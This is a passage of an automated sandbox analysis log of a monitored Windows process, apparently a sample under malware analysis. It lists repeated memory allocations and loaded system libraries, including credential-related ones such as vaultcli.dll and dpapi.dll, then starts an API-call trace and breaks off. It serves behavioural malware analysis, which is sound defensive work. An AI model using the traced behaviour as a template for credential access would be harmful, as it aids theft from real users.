0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3466 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3467 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3468 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3469 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3471 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3472 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3473 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3474 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3475 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3476 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3477 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3478 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3479 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3480 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3481 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3482 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3483 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3484 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3485 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3486 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3487 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3488 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3489 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3490 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3491 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3492 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3493 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3494 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3495 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3496 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3497 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3498 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3499 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3500 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3501 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3502 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3503 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3504 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3505 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3506 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3507 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3508 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3509 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3510 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3511 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3512 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3513 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3514 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3515 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3516 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3517 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3518 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3519 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3520 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3521 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3522 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3523 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3524 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3525 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3526 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3527 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3528 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3530 start_va = 0x75830000 end_va = 0x759a7fff monitored = 0 entry_point = 0x75888a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 3531 start_va = 0x754c0000 end_va = 0x754cdfff monitored = 0 entry_point = 0x754c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 3532 start_va = 0xf90000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 3533 start_va = 0xfd0000 end_va = 0x100ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 3534 start_va = 0x70430000 end_va = 0x70437fff monitored = 0 entry_point = 0x70431d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 3535 start_va = 0x753d0000 end_va = 0x754bafff monitored = 0 entry_point = 0x7540d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3536 start_va = 0x7300000 end_va = 0x7390fff monitored = 0 entry_point = 0x7338cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3537 start_va = 0x7300000 end_va = 0x7501fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007300000" filename = "" Region: id = 3538 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3539 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3540 start_va = 0x7510000 end_va = 0x76bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007510000" filename = "" Region: id = 3541 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3542 start_va = 0x74d20000 end_va = 0x74da3fff monitored = 0 entry_point = 0x74d46220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3543 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3544 start_va = 0x6f350000 end_va = 0x6fee8fff monitored = 0 entry_point = 0x6f526970 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 3545 start_va = 0x77390000 end_va = 0x7741cfff monitored = 0 entry_point = 0x773d9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3546 start_va = 0x74660000 end_va = 0x746f1fff monitored = 0 entry_point = 0x74698cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3547 start_va = 0x75db0000 end_va = 0x771aefff monitored = 0 entry_point = 0x75f6b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3548 start_va = 0x77640000 end_va = 0x77676fff monitored = 0 entry_point = 0x77643b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3549 start_va = 0x74ed0000 end_va = 0x753c8fff monitored = 0 entry_point = 0x750d7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3550 start_va = 0x74e70000 end_va = 0x74eb3fff monitored = 0 entry_point = 0x74e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3551 start_va = 0x77320000 end_va = 0x7732efff monitored = 0 entry_point = 0x77322e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3552 start_va = 0x720c0000 end_va = 0x7238afff monitored = 0 entry_point = 0x722fc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3553 start_va = 0x76c0000 end_va = 0x79f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3554 start_va = 0x420000 end_va = 0x421fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3555 start_va = 0x6f140000 end_va = 0x6f34efff monitored = 0 entry_point = 0x6f1eb0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 3556 start_va = 0x430000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 3557 start_va = 0x440000 end_va = 0x441fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3558 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 3559 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 3560 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3561 start_va = 0x470000 end_va = 0x474fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3562 start_va = 0x6cc70000 end_va = 0x6cc79fff monitored = 0 entry_point = 0x6cc73200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3563 start_va = 0x6cc30000 end_va = 0x6cc62fff monitored = 0 entry_point = 0x6cc40e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 3564 start_va = 0x724f0000 end_va = 0x7263afff monitored = 0 entry_point = 0x72551660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 3565 start_va = 0x470000 end_va = 0x474fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3567 start_va = 0x6cc80000 end_va = 0x6ccb9fff monitored = 0 entry_point = 0x6cc99be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 3568 start_va = 0x74200000 end_va = 0x7421afff monitored = 0 entry_point = 0x74209050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3569 start_va = 0x74130000 end_va = 0x741f7fff monitored = 0 entry_point = 0x7419ae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 3570 start_va = 0x6c960000 end_va = 0x6cacafff monitored = 0 entry_point = 0x6c9ce360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 3571 start_va = 0x7300000 end_va = 0x73affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007300000" filename = "" Region: id = 3572 start_va = 0x7a00000 end_va = 0x7ef1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007a00000" filename = "" Region: id = 3573 start_va = 0x7300000 end_va = 0x733ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007300000" filename = "" Region: id = 3574 start_va = 0x7340000 end_va = 0x737ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007340000" filename = "" Region: id = 3575 start_va = 0x73a0000 end_va = 0x73affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000073a0000" filename = "" Region: id = 3576 start_va = 0x7f00000 end_va = 0x83f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f00000" filename = "" Region: id = 3577 start_va = 0x400000 end_va = 0x403fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3578 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3579 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3580 start_va = 0x6c7e0000 end_va = 0x6c952fff monitored = 0 entry_point = 0x6c88d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 3581 start_va = 0x73b0000 end_va = 0x74affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000073b0000" filename = "" Region: id = 3582 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3583 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3584 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3585 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3587 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3588 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3591 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3592 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3593 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3594 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3595 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3596 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3597 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3598 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3601 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3602 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3603 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3604 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3611 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3612 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3614 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3628 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3631 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3632 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3633 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3634 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3635 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3636 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3637 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3638 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3639 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3640 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3641 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3642 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3643 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3644 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3645 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3646 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3647 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3648 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3649 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3650 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3651 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3652 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3653 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3654 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3655 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3656 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3657 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3658 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3659 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3660 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3661 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3662 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3665 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3666 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Thread: id = 62 os_tid = 0x38c [0130.767] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0xdf29c | out: HeapArray=0xdf29c*=0x6f0000) returned 0x2 [0130.779] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0xdf24c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0130.782] NtCreateFile (in: FileHandle=0xdf26c, DesiredAccess=0x120089, ObjectAttributes=0xdf234*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf254, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf26c*=0x88, IoStatusBlock=0xdf254*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0130.809] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f3980) returned 1 [0130.812] NtQueryInformationFile (in: FileHandle=0x88, IoStatusBlock=0xdf254, 